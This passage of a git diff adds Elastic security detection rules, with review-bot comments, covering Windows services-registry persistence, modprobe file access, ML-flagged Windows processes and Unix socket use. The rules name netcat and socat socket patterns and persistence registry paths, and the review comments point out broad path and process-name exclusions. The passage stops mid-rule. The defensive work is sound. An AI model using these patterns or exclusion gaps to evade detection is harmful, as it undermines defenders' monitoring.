@@ -0,0 +1,66 @@ +{ + "attributes": { + "anomaly_threshold": 75, + "author": [ + "Elastic" + ], + "description": "A machine learning job has detected a suspicious Windows process. This process has been classified as malicious in two ways. It was predicted to be malicious by the ProblemChild supervised ML model, and it was found to be suspicious given that its user context is unusual and does not commonly manifest malicious activity,by an unsupervised ML model. Such a process may be an instance of suspicious or malicious activity, possibly involving LOLbins, that may be resistant to detection using conventional search rules.", + "from": "now-45m", + "interval": "15m", + "license": "Elastic License v2", + "machine_learning_job_id": "problem_child_rare_process_by_user", + "name": "Unusual Process Spawned by a User", + "references": [ + "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html", + "https://docs.elastic.co/en/integrations/problemchild", + "https://www.elastic.co/security-labs/detecting-living-off-the-land-attacks-with-new-elastic-integration" + ], + "related_integrations": [ + { + "package": "problemchild", + "version": "^2.0.0" + }, + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "risk_score": 21, + "rule_id": "40155ee4-1e6a-4e4d-a63b-e8ba16980cfb", + "setup": "## Setup\n\nThe rule requires the Living off the Land (LotL) Attack Detection integration assets to be installed, as well as Windows process events collected by integrations such as Elastic Defend or Winlogbeat. 
\n\n### LotL Attack Detection Setup\nThe LotL Attack Detection integration detects living-off-the-land activity in Windows process events.\n\n#### Prerequisite Requirements:\n- Fleet is required for LotL Attack Detection.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n- Windows process events collected by the [Elastic Defend](https://docs.elastic.co/en/integrations/endpoint) integration or Winlogbeat(https://www.elastic.co/guide/en/beats/winlogbeat/current/_winlogbeat_overview.html).\n- To install Elastic Defend, refer to the [documentation](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n- To set up and run Winlogbeat, follow [this](https://www.elastic.co/guide/en/beats/winlogbeat/current/winlogbeat-installation-configuration.html) guide.\n\n#### The following steps should be executed to install assets associated with the LotL Attack Detection integration:\n- Go to the Kibana homepage. Under Management, click Integrations.\n- In the query bar, search for Living off the Land Attack Detection and select the integration to see more details about it.\n- Under Settings, click Install Living off the Land Attack Detection assets and follow the prompts to install the assets.\n\n#### Ingest Pipeline Setup\nBefore you can enable this rule, you'll need to enrich Windows process events with predictions from the Supervised LotL Attack Detection model. 
This is done via the ingest pipeline named `-problem_child_ingest_pipeline` installed with the LotL Attack Detection package.\n- If using an Elastic Beat such as Winlogbeat, add the LotL ingest pipeline to it by adding a simple configuration [setting](https://www.elastic.co/guide/en/elasticsearch/reference/current/ingest.html#pipelines-for-beats) to `winlogbeat.yml`.\n- If adding the LotL ingest pipeline to an existing pipeline, use a [pipeline processor](https://www.elastic.co/guide/en/elasticsearch/reference/current/pipeline-processor.html).\n\n#### Adding Custom Mappings\n- Go to the Kibana homepage. Under Management, click Stack Management.\n- Under Data click Index Management and navigate to the Component Templates tab.\n- Templates that can be edited to add custom components will be marked with a @custom suffix. Edit the @custom component template corresponding to the beat/integration you added the LotL ingest pipeline to, by pasting the following JSON blob in the \"Load JSON\" flyout:\n```\n{\n \"properties\": {\n \"problemchild\": {\n \"properties\": {\n \"prediction\": {\n \"type\": \"long\"\n },\n \"prediction_probability\": {\n \"type\": \"float\"\n }\n }\n },\n \"blocklist_label\": {\n \"type\": \"long\"\n }\n }\n}\n```\n\n### Anomaly Detection Setup\nBefore you can enable this rule, you'll need to enable the corresponding Anomaly Detection job. \n- Go to the Kibana homepage. Under Analytics, click Machine Learning.\n- Under Anomaly Detection, click Jobs, and then click \"Create job\". Select the Data View containing your enriched Windows process events. 
For example, this would be `logs-endpoint.events.*` if you used Elastic Defend to collect events, or `winlogbeat-*` if you used Winlogbeat.\n- If the selected Data View contains events that match the query in [this](https://github.com/elastic/integrations/blob/main/packages/problemchild/kibana/ml_module/problemchild-ml.json) configuration file, you will see a card for \"Living off the Land Attack Detection\" under \"Use preconfigured jobs\".\n- Keep the default settings and click \"Create jobs\" to start the anomaly detection job and datafeed.\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Living off the Land Attack Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Defense Evasion" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/" + } + ] + } + ], + "type": "machine_learning", + "version": 3 + }, + "id": "40155ee4-1e6a-4e4d-a63b-e8ba16980cfb_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/40155ee4-1e6a-4e4d-a63b-e8ba16980cfb_4.json b/packages/security_detection_engine/kibana/security_rule/40155ee4-1e6a-4e4d-a63b-e8ba16980cfb_4.json new file mode 100644 index 00000000000..7ac4545843c --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/40155ee4-1e6a-4e4d-a63b-e8ba16980cfb_4.json 
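Review bot: Two wording defects in this file also appear unchanged in the `_4` version in the next hunk: the `"description"` line has `malicious activity,by an unsupervised ML model` (missing space, and the clause order makes it hard to tell which model found what), and the `"setup"` text references `Winlogbeat(https://www.elastic.co/guide/en/beats/winlogbeat/current/_winlogbeat_overview.html)` without the markdown link brackets, so it renders as a bare parenthesised URL rather than a link; `[Winlogbeat](https://www.elastic.co/guide/en/beats/winlogbeat/current/_winlogbeat_overview.html)` would match the other references in the same string. The ingest pipeline is named `-problem_child_ingest_pipeline` with a leading hyphen, which looks like a version prefix was dropped from the template; please confirm the actual pipeline name shipped by the problemchild package before this goes out in operator-facing setup text.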
@@ -0,0 +1,66 @@ +{ + "attributes": { + "anomaly_threshold": 75, + "author": [ + "Elastic" + ], + "description": "A machine learning job has detected a suspicious Windows process. This process has been classified as malicious in two ways. It was predicted to be malicious by the ProblemChild supervised ML model, and it was found to be suspicious given that its user context is unusual and does not commonly manifest malicious activity,by an unsupervised ML model. Such a process may be an instance of suspicious or malicious activity, possibly involving LOLbins, that may be resistant to detection using conventional search rules.", + "from": "now-45m", + "interval": "15m", + "license": "Elastic License v2", + "machine_learning_job_id": "problem_child_rare_process_by_user", + "name": "Unusual Process Spawned by a User", + "references": [ + "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html", + "https://docs.elastic.co/en/integrations/problemchild", + "https://www.elastic.co/security-labs/detecting-living-off-the-land-attacks-with-new-elastic-integration" + ], + "related_integrations": [ + { + "package": "problemchild", + "version": "^2.0.0" + }, + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "risk_score": 21, + "rule_id": "40155ee4-1e6a-4e4d-a63b-e8ba16980cfb", + "setup": "## Setup\n\nThe rule requires the Living off the Land (LotL) Attack Detection integration assets to be installed, as well as Windows process events collected by integrations such as Elastic Defend or Winlogbeat. 
\n\n### LotL Attack Detection Setup\nThe LotL Attack Detection integration detects living-off-the-land activity in Windows process events.\n\n#### Prerequisite Requirements:\n- Fleet is required for LotL Attack Detection.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n- Windows process events collected by the [Elastic Defend](https://docs.elastic.co/en/integrations/endpoint) integration or Winlogbeat(https://www.elastic.co/guide/en/beats/winlogbeat/current/_winlogbeat_overview.html).\n- To install Elastic Defend, refer to the [documentation](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n- To set up and run Winlogbeat, follow [this](https://www.elastic.co/guide/en/beats/winlogbeat/current/winlogbeat-installation-configuration.html) guide.\n\n#### The following steps should be executed to install assets associated with the LotL Attack Detection integration:\n- Go to the Kibana homepage. Under Management, click Integrations.\n- In the query bar, search for Living off the Land Attack Detection and select the integration to see more details about it.\n- Under Settings, click Install Living off the Land Attack Detection assets and follow the prompts to install the assets.\n\n#### Ingest Pipeline Setup\n**Before you can enable this rule**, you'll need to enrich Windows process events with predictions from the Supervised LotL Attack Detection model. 
This is done via the ingest pipeline named `-problem_child_ingest_pipeline` installed with the LotL Attack Detection package.\n- If using an Elastic Beat such as Winlogbeat, add the LotL ingest pipeline to it by adding a simple configuration [setting](https://www.elastic.co/guide/en/elasticsearch/reference/current/ingest.html#pipelines-for-beats) to `winlogbeat.yml`.\n- If adding the LotL ingest pipeline to an existing pipeline, use a [pipeline processor](https://www.elastic.co/guide/en/elasticsearch/reference/current/pipeline-processor.html). For example, you can check if your winlogbeat or Elastic Defend (the [default index pattern](https://docs.elastic.co/en/integrations/endpoint#logs) being `logs-endpoint*`) already has an ingest pipeline by navigating to `Data > Index Management`, finding the index (sometimes you need to toggle \"Include hidden indices\"), and checking the index's settings for a default or final [pipeline](https://www.elastic.co/guide/en/elasticsearch/reference/current/ingest.html#set-default-pipeline).\n\n#### Adding Custom Mappings\n- Go to the Kibana homepage. Under Management, click Stack Management.\n- Under Data click Index Management and navigate to the Component Templates tab.\n- Templates that can be edited to add custom components will be marked with a @custom suffix. Edit the @custom component template corresponding to the beat/integration you added the LotL ingest pipeline to, by pasting the following JSON blob in the \"Load JSON\" flyout:\n```\n{\n \"properties\": {\n \"problemchild\": {\n \"properties\": {\n \"prediction\": {\n \"type\": \"long\"\n },\n \"prediction_probability\": {\n \"type\": \"float\"\n }\n }\n },\n \"blocklist_label\": {\n \"type\": \"long\"\n }\n }\n}\n```\n\n### Anomaly Detection Setup\n**Before you can enable this rule**, you'll need to enable the corresponding Anomaly Detection job. \n- Go to the Kibana homepage. 
Under Analytics, click Machine Learning.\n- Under Anomaly Detection, click Jobs, and then click \"Create job\". Select the Data View containing your enriched Windows process events. For example, this would be `logs-endpoint.events.*` if you used Elastic Defend to collect events, or `winlogbeat-*` if you used Winlogbeat.\n- If the selected Data View contains events that match the query in [this](https://github.com/elastic/integrations/blob/main/packages/problemchild/kibana/ml_module/problemchild-ml.json) configuration file, you will see a card for \"Living off the Land Attack Detection\" under \"Use preconfigured jobs\". Warning: if the ingest pipeline hasn't run for some reason, such as no eligible data in winlogbeat has come in yet, _you won't be able to see this card yet_. If that is the case, try troubleshooting the ingest pipeline, and if any ProblemChild predictions have been populated yet.\n- Keep the default settings and click \"Create jobs\" to start the anomaly detection job and datafeed.\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Living off the Land Attack Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Defense Evasion" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/" + } + ] + } + ], + "type": "machine_learning", + "version": 4 + }, + "id": "40155ee4-1e6a-4e4d-a63b-e8ba16980cfb_4", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/403ef0d3-8259-40c9-a5b6-d48354712e49_107.json b/packages/security_detection_engine/kibana/security_rule/403ef0d3-8259-40c9-a5b6-d48354712e49_107.json new file mode 100644 index 00000000000..852ad4d40c0 --- /dev/null 
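Review bot: The troubleshooting sentence added to the `"setup"` string in this version is ungrammatical: "try troubleshooting the ingest pipeline, and if any ProblemChild predictions have been populated yet" has no verb for the second clause. Suggest `If that is the case, troubleshoot the ingest pipeline and check whether any ProblemChild predictions have been populated yet.` The new guidance on checking for a default or final pipeline under `Data > Index Management` is useful, but it sits inside the pipeline-processor bullet; it reads more naturally as its own bullet so operators who are not using a pipeline processor still see it.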
+++ b/packages/security_detection_engine/kibana/security_rule/403ef0d3-8259-40c9-a5b6-d48354712e49_107.json 
@@ -0,0 +1,113 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies processes modifying the services registry key directly, instead of through the expected Windows APIs. This could be an indication of an adversary attempting to stealthily persist through abnormal service creation or modification of an existing service.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Unusual Persistence via Services Registry", + "query": "registry where host.os.type == \"windows\" and event.type == \"change\" and\n registry.path : (\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Services\\\\*\\\\ServiceDLL\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Services\\\\*\\\\ImagePath\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\ControlSet*\\\\Services\\\\*\\\\ServiceDLL\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\ControlSet*\\\\Services\\\\*\\\\ImagePath\"\n ) and not registry.data.strings : (\n \"?:\\\\windows\\\\system32\\\\Drivers\\\\*.sys\",\n \"\\\\SystemRoot\\\\System32\\\\drivers\\\\*.sys\",\n \"\\\\??\\\\?:\\\\Windows\\\\system32\\\\Drivers\\\\*.SYS\",\n \"system32\\\\DRIVERS\\\\USBSTOR\") and\n not (process.name : \"procexp??.exe\" and registry.data.strings : \"?:\\\\*\\\\procexp*.sys\") and\n not process.executable : (\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Windows\\\\winsxs\\\\*\\\\TiWorker.exe\",\n \"?:\\\\Windows\\\\System32\\\\drvinst.exe\",\n \"?:\\\\Windows\\\\System32\\\\services.exe\",\n \"?:\\\\Windows\\\\System32\\\\msiexec.exe\",\n \"?:\\\\Windows\\\\System32\\\\regsvr32.exe\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" 
+ }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "403ef0d3-8259-40c9-a5b6-d48354712e49", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/", + "subtechnique": [ + { + "id": "T1543.003", + "name": "Windows Service", + "reference": "https://attack.mitre.org/techniques/T1543/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "403ef0d3-8259-40c9-a5b6-d48354712e49_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/403ef0d3-8259-40c9-a5b6-d48354712e49_108.json b/packages/security_detection_engine/kibana/security_rule/403ef0d3-8259-40c9-a5b6-d48354712e49_108.json new file mode 100644 index 00000000000..19254911078 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/403ef0d3-8259-40c9-a5b6-d48354712e49_108.json 
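Review bot: The `"index"` list includes `logs-windows.sysmon_operational-*` and the tags claim `Data Source: Sysmon`, but `related_integrations` lists only `endpoint`; rule 40155ee4 in this same commit pairs `endpoint` with `{ "package": "windows", "version": "^1.5.0" }`, so the same entry is presumably missing here and in the `_108` file in the next hunk. The exclusion `not process.executable : ("?:\\Program Files\\*.exe", "?:\\Program Files (x86)\\*.exe", ...)` allowlists every binary under both Program Files trees by path alone, which is a much broader carve-out than the named system executables that follow it; if the endpoint data carries code-signature fields, pairing that path pattern with `process.code_signature.trusted == true` would keep the intended noise reduction while narrowing the gap. Either way the breadth of that exclusion deserves a sentence in the rule's `"description"` or a `"note"` so analysts tuning it know it is there.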
@@ -0,0 +1,113 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies processes modifying the services registry key directly, instead of through the expected Windows APIs. This could be an indication of an adversary attempting to stealthily persist through abnormal service creation or modification of an existing service.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.registry-*", + "endgame-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Unusual Persistence via Services Registry", + "query": "registry where host.os.type == \"windows\" and event.type == \"change\" and\n registry.path : (\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Services\\\\*\\\\ServiceDLL\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Services\\\\*\\\\ImagePath\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\ControlSet*\\\\Services\\\\*\\\\ServiceDLL\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\ControlSet*\\\\Services\\\\*\\\\ImagePath\"\n ) and not registry.data.strings : (\n \"?:\\\\windows\\\\system32\\\\Drivers\\\\*.sys\",\n \"\\\\SystemRoot\\\\System32\\\\drivers\\\\*.sys\",\n \"\\\\??\\\\?:\\\\Windows\\\\system32\\\\Drivers\\\\*.SYS\",\n \"system32\\\\DRIVERS\\\\USBSTOR\") and\n not (process.name : \"procexp??.exe\" and registry.data.strings : \"?:\\\\*\\\\procexp*.sys\") and\n not process.executable : (\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Windows\\\\winsxs\\\\*\\\\TiWorker.exe\",\n \"?:\\\\Windows\\\\System32\\\\drvinst.exe\",\n \"?:\\\\Windows\\\\System32\\\\services.exe\",\n \"?:\\\\Windows\\\\System32\\\\msiexec.exe\",\n \"?:\\\\Windows\\\\System32\\\\regsvr32.exe\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": 
"keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "403ef0d3-8259-40c9-a5b6-d48354712e49", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/", + "subtechnique": [ + { + "id": "T1543.003", + "name": "Windows Service", + "reference": "https://attack.mitre.org/techniques/T1543/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "403ef0d3-8259-40c9-a5b6-d48354712e49_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/40ddbcc8-6561-44d9-afc8-eefdbfe0cccd_106.json b/packages/security_detection_engine/kibana/security_rule/40ddbcc8-6561-44d9-afc8-eefdbfe0cccd_106.json new file mode 100644 index 00000000000..24737ee9d1c --- /dev/null 
+++ b/packages/security_detection_engine/kibana/security_rule/40ddbcc8-6561-44d9-afc8-eefdbfe0cccd_106.json 
@@ -0,0 +1,91 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Detects file events involving kernel modules in modprobe configuration files, which may indicate unauthorized access or manipulation of critical kernel modules. Attackers may tamper with the modprobe files to load malicious or unauthorized kernel modules, potentially bypassing security measures, escalating privileges, or hiding their activities within the system.", + "from": "now-119m", + "history_window_start": "now-7d", + "index": [ + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "interval": "60m", + "language": "kuery", + "license": "Elastic License v2", + "name": "Suspicious Modprobe File Event", + "new_terms_fields": [ + "host.id", + "process.executable", + "file.path" + ], + "query": "host.os.type:linux and event.category:file and event.action:\"opened-file\" and\nfile.path : (\"/etc/modprobe.conf\" or \"/etc/modprobe.d\" or /etc/modprobe.d/*) and \nnot process.name:(cp or dpkg or dockerd or lynis or mkinitramfs or snapd)\n", + "related_integrations": [ + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "40ddbcc8-6561-44d9-afc8-eefdbfe0cccd", + "setup": "\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. 
With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /etc/modprobe.conf -p wa -k modprobe\n-w /etc/modprobe.d -p wa -k modprobe\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.\n", + "severity": "low", + "tags": [ + "Data Source: Auditd Manager", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1082", + "name": "System Information Discovery", + "reference": "https://attack.mitre.org/techniques/T1082/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 106 + }, + "id": "40ddbcc8-6561-44d9-afc8-eefdbfe0cccd_106", + "type": "security-rule" +} \ No newline at end of file 
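Review bot: The `"threat"` mapping is `TA0007` Discovery / `T1082` System Information Discovery, while the `"description"` line describes tampering with modprobe configuration "to load malicious or unauthorized kernel modules, potentially bypassing security measures, escalating privileges, or hiding their activities", which is persistence and defense-evasion behaviour; either the mapping or the description should be adjusted so the tags reflect what the rule is meant to catch (the `_107` file in the next hunk has the same mismatch). The `"setup"` text prescribes `-w /etc/modprobe.conf -p wa -k modprobe` and `-w /etc/modprobe.d -p wa -k modprobe`, and if I read `-p wa` correctly only write and attribute-change opens are logged, so the `event.action:"opened-file"` query would not see read-only access and "unauthorized access" in the description overstates coverage unless the watch is widened to `-p rwa`. The closing sentence "from which auditd log files are desirable" is awkward; `from which auditd events should be collected` is clearer.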
diff --git a/packages/security_detection_engine/kibana/security_rule/40ddbcc8-6561-44d9-afc8-eefdbfe0cccd_107.json b/packages/security_detection_engine/kibana/security_rule/40ddbcc8-6561-44d9-afc8-eefdbfe0cccd_107.json new file mode 100644 index 00000000000..a93133b9fa9 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/40ddbcc8-6561-44d9-afc8-eefdbfe0cccd_107.json 
@@ -0,0 +1,90 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Detects file events involving kernel modules in modprobe configuration files, which may indicate unauthorized access or manipulation of critical kernel modules. Attackers may tamper with the modprobe files to load malicious or unauthorized kernel modules, potentially bypassing security measures, escalating privileges, or hiding their activities within the system.", + "from": "now-119m", + "history_window_start": "now-14d", + "index": [ + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "interval": "60m", + "language": "kuery", + "license": "Elastic License v2", + "name": "Suspicious Modprobe File Event", + "new_terms_fields": [ + "host.id", + "process.executable" + ], + "query": "host.os.type:linux and event.category:file and event.action:\"opened-file\" and\nfile.path : (\"/etc/modprobe.conf\" or \"/etc/modprobe.d\" or /etc/modprobe.d/*) and not process.name:(\n cp or dpkg or dockerd or lynis or mkinitramfs or snapd or systemd-udevd or grep or borg or auditbeat or lspci or\n aide or modprobe or python*\n)\n", + "related_integrations": [ + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "40ddbcc8-6561-44d9-afc8-eefdbfe0cccd", + "setup": "## Setup\n\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. 
It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /etc/modprobe.conf -p wa -k modprobe\n-w /etc/modprobe.d -p wa -k modprobe\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.\n", + "severity": "low", + "tags": [ + "Data Source: Auditd Manager", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1082", + "name": "System Information Discovery", + "reference": "https://attack.mitre.org/techniques/T1082/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 107 + }, + "id": "40ddbcc8-6561-44d9-afc8-eefdbfe0cccd_107", + "type": "security-rule" +} \ No newline at end of file 
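Review bot: The `not process.name:(...)` exclusion in `query` is keyed only on the process name, and the `python*` wildcard in that list exempts every interpreter-named process rather than one specific binary, making it the broadest exception in the rule. Since the rule already tracks `process.executable` as a new_terms field, anchoring the noisy exceptions on the executable path (for example `not process.executable:(/usr/bin/python3* or ...)`, paths illustrative and to be confirmed against host data) would keep the same false-positive coverage with a narrower exception. The same exclusion list appears in the preceding `_106` revision of this rule, whose hunk begins outside this chunk.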
diff --git a/packages/security_detection_engine/kibana/security_rule/41284ba3-ed1a-4598-bfba-a97f75d9aba2_2.json b/packages/security_detection_engine/kibana/security_rule/41284ba3-ed1a-4598-bfba-a97f75d9aba2_2.json new file mode 100644 index 00000000000..07df7600a36 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/41284ba3-ed1a-4598-bfba-a97f75d9aba2_2.json 
@@ -0,0 +1,92 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "This rule monitors for inter-process communication via Unix sockets. Adversaries may attempt to communicate with local Unix sockets to enumerate application details, find vulnerabilities/configuration mistakes and potentially escalate privileges or set up malicious communication channels via Unix sockets for inter-process communication to attempt to evade detection.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Unix Socket Connection", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\", \"executed\", \"process_started\")\n and (\n (process.name in (\"nc\", \"ncat\", \"netcat\", \"nc.openbsd\") and \n process.args == \"-U\" and process.args : (\"/usr/local/*\", \"/run/*\", \"/var/run/*\")) or\n (process.name == \"socat\" and \n process.args == \"-\" and process.args : (\"UNIX-CLIENT:/usr/local/*\", \"UNIX-CLIENT:/run/*\", \"UNIX-CLIENT:/var/run/*\"))\n)\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": 